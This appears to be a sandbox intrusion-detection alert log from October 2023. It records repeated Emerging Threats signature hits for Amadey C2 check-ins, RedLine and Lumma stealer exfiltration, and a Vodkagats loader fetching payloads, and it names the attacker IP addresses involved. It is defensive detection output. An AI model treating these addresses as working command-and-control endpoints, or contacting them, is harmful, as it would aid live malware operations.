Timestamp:	192.168.2.579.137.192.1849888802027700 10/13/23-15:22:25.611074
SID:	2027700
Source Port:	49888
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849827802027700 10/13/23-15:22:02.484088
SID:	2027700
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849980802027700 10/13/23-15:23:02.438820
SID:	2027700
Source Port:	49980
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849818802027700 10/13/23-15:21:59.765202
SID:	2027700
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850014802027700 10/13/23-15:23:29.384442
SID:	2027700
Source Port:	50014
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849949802027700 10/13/23-15:22:46.856478
SID:	2027700
Source Port:	49949
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849935802027700 10/13/23-15:22:41.369435
SID:	2027700
Source Port:	49935
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849811802027700 10/13/23-15:21:55.404458
SID:	2027700
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849996802027700 10/13/23-15:23:15.429834
SID:	2027700
Source Port:	49996
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849831802027700 10/13/23-15:22:04.252548
SID:	2027700
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849846802027700 10/13/23-15:22:08.725831
SID:	2027700
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849872802027700 10/13/23-15:22:18.269417
SID:	2027700
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.143.166.163 - Destination IP: 192.168.2.5

Timestamp:	34.143.166.163192.168.2.580497192037771 10/13/23-15:20:45.479212
SID:	2037771
Source Port:	80
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849961802027700 10/13/23-15:22:53.278646
SID:	2027700
Source Port:	49961
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850052802027700 10/13/23-15:23:57.510920
SID:	2027700
Source Port:	50052
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850015802027700 10/13/23-15:23:30.287697
SID:	2027700
Source Port:	50015
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850056802027700 10/13/23-15:24:00.271518
SID:	2027700
Source Port:	50056
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850033802027700 10/13/23-15:23:43.497769
SID:	2027700
Source Port:	50033
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849776802027700 10/13/23-15:21:33.032973
SID:	2027700
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849901802027700 10/13/23-15:22:30.071196
SID:	2027700
Source Port:	49901
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 51.255.152.132

Timestamp:	192.168.2.551.255.152.13249726360112043231 10/13/23-15:21:22.521434
SID:	2043231
Source Port:	49726
Destination Port:	36011
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849770802027700 10/13/23-15:21:26.821669
SID:	2027700
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849812802027700 10/13/23-15:21:56.269499
SID:	2027700
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849995802027700 10/13/23-15:23:14.519824
SID:	2027700
Source Port:	49995
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849977802027700 10/13/23-15:23:00.587433
SID:	2027700
Source Port:	49977
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849830802027700 10/13/23-15:22:03.350000
SID:	2027700
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849951802027700 10/13/23-15:22:47.744869
SID:	2027700
Source Port:	49951
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849942802027700 10/13/23-15:22:44.119537
SID:	2027700
Source Port:	49942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850043802027700 10/13/23-15:23:50.801175
SID:	2027700
Source Port:	50043
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849890802027700 10/13/23-15:22:26.527594
SID:	2027700
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849795802027700 10/13/23-15:21:46.736624
SID:	2027700
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850046802027700 10/13/23-15:23:52.657875
SID:	2027700
Source Port:	50046
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.5 - Destination IP: 187.18.108.158

Timestamp:	192.168.2.5187.18.108.15849738802036333 10/13/23-15:21:09.695197
SID:	2036333
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 172.67.144.245

Timestamp:	192.168.2.5172.67.144.24549911802048094 10/13/23-15:22:34.163386
SID:	2048094
Source Port:	49911
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849881802027700 10/13/23-15:22:22.746398
SID:	2027700
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849792802027700 10/13/23-15:21:44.985008
SID:	2027700
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849917802027700 10/13/23-15:22:36.079538
SID:	2027700
Source Port:	49917
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849932802027700 10/13/23-15:22:40.485008
SID:	2027700
Source Port:	49932
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849967802027700 10/13/23-15:22:56.947274
SID:	2027700
Source Port:	49967
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849837802027700 10/13/23-15:22:06.032791
SID:	2027700
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849789802027700 10/13/23-15:21:42.529353
SID:	2027700
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850024802027700 10/13/23-15:23:36.718762
SID:	2027700
Source Port:	50024
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850065802027700 10/13/23-15:24:06.609516
SID:	2027700
Source Port:	50065
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849809802027700 10/13/23-15:21:54.535328
SID:	2027700
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850059802027700 10/13/23-15:24:02.078548
SID:	2027700
Source Port:	50059
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey Bot Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849755802044623 10/13/23-15:21:20.814894
SID:	2044623
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849992802027700 10/13/23-15:23:12.766670
SID:	2027700
Source Port:	49992
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849815802027700 10/13/23-15:21:58.021683
SID:	2027700
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849910802027700 10/13/23-15:22:34.296636
SID:	2027700
Source Port:	49910
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849945802027700 10/13/23-15:22:44.996438
SID:	2027700
Source Port:	49945
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849773802027700 10/13/23-15:21:30.352704
SID:	2027700
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849986802027700 10/13/23-15:23:07.333075
SID:	2027700
Source Port:	49986
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849904802027700 10/13/23-15:22:31.151402
SID:	2027700
Source Port:	49904
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer Activity (Response) - Source IP: 51.255.152.132 - Destination IP: 192.168.2.5

Timestamp:	51.255.152.132192.168.2.536011497262046056 10/13/23-15:21:08.276078
SID:	2046056
Source Port:	36011
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849824802027700 10/13/23-15:22:01.551541
SID:	2027700
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849885802027700 10/13/23-15:22:24.718319
SID:	2027700
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849983802027700 10/13/23-15:23:05.573611
SID:	2027700
Source Port:	49983
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) - Source IP: 192.168.2.5 - Destination IP: 51.255.152.132

Timestamp:	192.168.2.551.255.152.13249726360112046045 10/13/23-15:21:02.577805
SID:	2046045
Source Port:	49726
Destination Port:	36011
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849839802027700 10/13/23-15:22:06.909163
SID:	2027700
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849870802027700 10/13/23-15:22:17.367414
SID:	2027700
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849998802027700 10/13/23-15:23:17.197786
SID:	2027700
Source Port:	49998
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850011802027700 10/13/23-15:23:27.276546
SID:	2027700
Source Port:	50011
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850069802027700 10/13/23-15:24:09.282731
SID:	2027700
Source Port:	50069
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849772802027700 10/13/23-15:21:29.419531
SID:	2027700
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849937802027700 10/13/23-15:22:42.272905
SID:	2027700
Source Port:	49937
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849955802027700 10/13/23-15:22:49.589059
SID:	2027700
Source Port:	49955
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849852802027700 10/13/23-15:22:10.463429
SID:	2027700
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849857802027700 10/13/23-15:22:12.381097
SID:	2027700
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850008802027700 10/13/23-15:23:24.569660
SID:	2027700
Source Port:	50008
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850026802027700 10/13/23-15:23:38.933373
SID:	2027700
Source Port:	50026
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.5 - Destination IP: 14.33.209.147

Timestamp:	192.168.2.514.33.209.14749742802036333 10/13/23-15:21:15.445707
SID:	2036333
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850003802027700 10/13/23-15:23:20.834324
SID:	2027700
Source Port:	50003
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In - Source IP: 192.168.2.5 - Destination IP: 104.21.34.166

Timestamp:	192.168.2.5104.21.34.16649887802048093 10/13/23-15:22:25.374045
SID:	2048093
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850021802027700 10/13/23-15:23:33.891622
SID:	2027700
Source Port:	50021
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849988802027700 10/13/23-15:23:09.175394
SID:	2027700
Source Port:	49988
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849860802027700 10/13/23-15:22:13.283315
SID:	2027700
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849947802027700 10/13/23-15:22:45.968840
SID:	2027700
Source Port:	49947
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849782802027700 10/13/23-15:21:38.174752
SID:	2027700
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849965802027700 10/13/23-15:22:56.037656
SID:	2027700
Source Port:	49965
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849745802044696 10/13/23-15:21:19.391590
SID:	2044696
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849806802027700 10/13/23-15:21:52.775205
SID:	2027700
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849960802027700 10/13/23-15:22:52.367814
SID:	2027700
Source Port:	49960
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849957802027700 10/13/23-15:22:50.507935
SID:	2027700
Source Port:	49957
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850031802027700 10/13/23-15:23:41.647202
SID:	2027700
Source Port:	50031
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849801802027700 10/13/23-15:21:50.125830
SID:	2027700
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850034802027700 10/13/23-15:23:44.433170
SID:	2027700
Source Port:	50034
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849779802027700 10/13/23-15:21:35.606807
SID:	2027700
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849930802027700 10/13/23-15:22:39.605062
SID:	2027700
Source Port:	49930
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849877802027700 10/13/23-15:22:20.983769
SID:	2027700
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849731802027700 10/13/23-15:21:05.354963
SID:	2027700
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849893802027700 10/13/23-15:22:27.412106
SID:	2027700
Source Port:	49893
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849914802027700 10/13/23-15:22:35.162156
SID:	2027700
Source Port:	49914
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850049802027700 10/13/23-15:23:54.539563
SID:	2027700
Source Port:	50049
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849822802027700 10/13/23-15:22:00.660821
SID:	2027700
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849991802027700 10/13/23-15:23:11.895804
SID:	2027700
Source Port:	49991
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850064802027700 10/13/23-15:24:05.629334
SID:	2027700
Source Port:	50064
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849777802027700 10/13/23-15:21:33.891838
SID:	2027700
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849774802027700 10/13/23-15:21:31.254996
SID:	2027700
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849993802027700 10/13/23-15:23:13.624324
SID:	2027700
Source Port:	49993
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849898802027700 10/13/23-15:22:29.153493
SID:	2027700
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849814802027700 10/13/23-15:21:57.135438
SID:	2027700
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849780802027700 10/13/23-15:21:36.474782
SID:	2027700
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1849855802027700 10/13/23-15:22:11.435427
SID:	2027700
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

Timestamp:	192.168.2.579.137.192.1850006802027700 10/13/23-15:23:22.778047
SID:	2027700
Source Port:	50006
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.5 - Destination IP: 79.137.192.18

